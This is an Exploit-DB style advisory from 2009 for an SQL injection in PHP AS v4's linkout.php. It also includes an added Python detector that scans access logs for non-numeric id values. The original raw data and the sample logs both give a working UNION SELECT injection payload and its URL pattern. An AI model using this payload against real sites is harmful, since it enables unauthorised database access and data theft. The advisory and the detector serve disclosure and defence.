Vendor: PHP AS v4
By: MizoZ [EvilWay Team]
CVSS: 8,8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PHP AS v4
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: YES
Related CWE: N/A
CPE: a:phparcadescript:php_as_v4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHP AS v4

PHP AS v4 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries to view, add, modify or delete records in the back-end database.

Mitigation:

Upgrade to the latest version of PHP AS v4
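
A defender-side check for the request pattern this advisory reports, as an added example that is not part of the original advisory or the product: it scans web access logs for `linkout.php` requests whose `id` value is not a plain integer. The log lines, the `/arcade` path and the assumption that legitimate `id` values are numeric are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed common-log-format lines for illustration; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Jul/2009:10:01:02 +0000] "GET /arcade/linkout.php?id=42 HTTP/1.1" 302 0
203.0.113.9 - - [28/Jul/2009:10:03:11 +0000] "GET /arcade/linkout.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11-- HTTP/1.1" 200 512
203.0.113.9 - - [28/Jul/2009:10:03:40 +0000] "GET /arcade/linkout.php?id=null%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11-- HTTP/1.1" 200 498
198.51.100.7 - - [28/Jul/2009:10:04:00 +0000] "GET /arcade/linkout.php?id=12abc HTTP/1.1" 200 90
198.51.100.7 - - [28/Jul/2009:10:04:30 +0000] "GET /arcade/index.php?id=abc HTTP/1.1" 200 900
198.51.100.7 - - [28/Jul/2009:10:05:00 +0000] "GET /arcade/linkout.php HTTP/1.1" 200 100
"""

# Captures client address, timestamp and request target of one log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) [^"]*"')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def flag_linkout_requests(log_text):
    """Return (client, timestamp, kind, decoded_id) for every linkout.php
    request whose id parameter is not a plain decimal integer."""
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        client, when, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/linkout.php"):
            continue
        # parse_qs URL-decodes the value, so '+' and %20 both become spaces.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # assumption: legitimate ids are numeric
            kind = "union-select" if UNION_RE.search(value) else "non-numeric"
            findings.append((client, when, kind, value))
    return findings


if __name__ == "__main__":
    for finding in flag_linkout_requests(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

The allow-list test (digits only) is what does the flagging; the keyword match only labels the finding, so differently encoded or cased input is still reported.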
Exploit-DB raw data:

----------------------------------------------------------------------------------------------------
  Name : PHP AS v4
  Site : http://www.phparcadescript.com/

----------------------------------------------------------------------------------------------------
 
  Found By : MizoZ [EvilWay Team]
  Made in  : Morocco
  Contact  : mizoz[at]9[dot]cn
  Greetz   : Moudi , Zuka , JIKO , opt!x , All friends
  Website : BlackArea.org (Coming Soon)
----------------------------------------------------------------------------------------------------

SQL Injection linkout.php (GET : id) :
[HOST]/[PATH]/linkout.php?id=[SQL CODE]

SQL CODE : null+union+select+1,2,3,4,5,6,7,8,9,10,11--

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-28]